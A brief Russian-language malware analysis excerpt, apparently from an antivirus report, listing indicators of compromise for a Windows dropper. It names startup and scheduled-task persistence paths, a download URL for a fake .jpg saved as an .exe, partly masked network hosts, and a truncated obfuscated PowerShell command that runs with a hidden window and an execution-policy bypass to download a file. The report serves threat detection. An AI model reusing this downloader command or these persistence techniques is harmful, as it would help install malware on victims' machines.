Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\jbsrwawe.lnk
- <SYSTEM32>\tasks\opera scheduled autoupdate 3131961373
- https://u.teknik.io/28olw.jpg как %temp%\evdwacbtpw.exe
- %TEMP%\evdwacbtpw.exe
- %APPDATA%\microsoft\windows\jbsrwawe\wwjicbic.exe
- %APPDATA%\microsoft\windows\jbsrwawe\wwjicbic.exe
- %TEMP%\evdwacbtpw.exe
- 'u.##knik.io':443
- 'ms###csi.com':80
- '94.##0.115.43':80
- 'u.##knik.io':443
- DNS ASK u.##knik.io
- '%TEMP%\evdwacbtpw.exe'
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAo...' (со скрытым окном)